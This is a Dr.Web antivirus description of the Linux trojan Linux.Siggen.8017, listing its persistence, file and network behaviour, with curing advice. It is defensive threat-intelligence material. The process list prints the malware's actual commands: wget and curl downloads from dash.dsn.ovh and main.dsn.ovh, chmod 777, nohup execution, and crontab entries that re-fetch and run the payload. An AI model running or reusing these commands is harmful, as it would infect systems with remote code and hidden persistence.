マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Linux.Siggen.8017

Added to the Dr.Web virus database: 2024-08-31

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /var/spool/cron/crontabs/root
  • /etc/crontab
Malicious functions:
Launches processes:
  • wget -nc http://dash.dsn.ovh/dns/sshd -q -P /var/tmp/
  • crontab -l
  • chmod 777 /var/tmp/retrict.sh
  • grep -qxF * * * * * /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27
  • wget -nc http://dash.dsn.ovh/dns/retrict.sh -q -P /var/tmp/
  • rm -rf .pkexec
  • /usr/bin/grep <0xaa>
  • ./sinax
  • wget -nc http://dash.dsn.ovh/dns/incbit -q -P /var/tmp/
  • <0x11>
  • wget -nc http://dash.dsn.ovh/dns/truct.sh -q -P /var/tmp/
  • /bin/sh ./unix.sh
  • rm retrict.sh
  • chmod 777 /tmp/lushput
  • wget -nc http://dash.dsn.ovh/dns/politrict.sh -q -P /var/tmp/
  • crontab -
  • chmod 777 /var/tmp/sinax
  • chmod 777 /var/tmp/incbit
  • grep -qxF 0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c \x27cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json\x27
  • grep -qxF
  • rm truct.sh
  • rm incbit
  • wget -nc http://dash.dsn.ovh/dns/seasbit -q -P /tmp/
  • <0x29>
  • chmod 777 /var/tmp/unix.sh
  • wget -nc http://dash.dsn.ovh/dns/config.json -q -P /var/tmp/
  • nohup ./sshd
  • grep -qxF * * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27 /etc/crontab
  • /bin/sh -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
  • rm -rf lushput systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og tmux-0
  • /bin/sh ./politrict.sh
  • chmod 777 /tmp/seasbit
  • wget -nc http://dash.dsn.ovh/dns/loadbit -q -P /tmp/
  • chmod 777 /tmp/loadbit
  • wget -nc http://dash.dsn.ovh/dns/lushput -q -P /tmp/
  • chmod 777 /var/tmp/truct.sh
  • wget -nc http://dash.dsn.ovh/dns/brict.sh -q -P /var/tmp/
  • rm sinax
  • rm -rf loadbit
  • rm unix.sh
  • /usr/bin/flock -n /var/tmp/vm.lock -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
  • wget -nc http://dash.dsn.ovh/dns/sinax -q -P /var/tmp/
  • chmod 777 /var/tmp/politrict.sh
  • wget -nc http://dash.dsn.ovh/dns/unix.sh -q -P /var/tmp/
  • /bin/sh ./truct.sh
  • rm brict.sh
  • rm politrict.sh
  • /bin/sh ./retrict.sh
  • /bin/sh ./brict.sh
  • /bin/sh ./sshd
  • chmod 777 /var/tmp/sshd
  • chmod 777 /var/tmp/brict.sh
  • crontab -crontab -l
Performs operations with the file system:
Modifies file access rights:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/spool/cron/crontabs/tmp.MtGTGR
  • /var/tmp/truct.sh
  • /var/spool/cron/crontabs/tmp.LoxhwO
  • /var/tmp/brict.sh
  • /var/spool/cron/crontabs/tmp.oT6mFA
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Deletes folders:
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og/tmp
  • /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og
  • /tmp/tmux-0
Creates or modifies files:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/tmp/config.json
  • /var/spool/cron/crontabs/tmp.MtGTGR
  • /var/tmp/truct.sh
  • /var/spool/cron/crontabs/tmp.LoxhwO
  • /var/tmp/brict.sh
  • /var/spool/cron/crontabs/tmp.oT6mFA
  • /var/tmp/vm.lock
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Deletes files:
  • /var/tmp/unix.sh
  • /var/tmp/truct.sh
  • /var/tmp/brict.sh
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /var/tmp/sinax
  • /tmp/lushput
  • /tmp/tmux-0/default
  • /tmp/loadbit
Locks files:
  • /var/tmp/vm.lock
Changes time of creation/access/modification of files:
  • /var/tmp/sinax
  • /var/tmp/unix.sh
  • /var/tmp/sshd
  • /var/tmp/config.json
  • /var/spool/cron/crontabs
  • /var/tmp/truct.sh
  • /var/tmp/brict.sh
  • /var/tmp/retrict.sh
  • /var/tmp/politrict.sh
  • /tmp/lushput
  • /tmp/loadbit
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 19#.##.43.137:80
DNS ASK:
  • da##.dsn.ovh
Sends data to the following servers:
  • 19#.##.43.137:80
Receives data from the following servers:
  • 19#.##.43.137:80

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number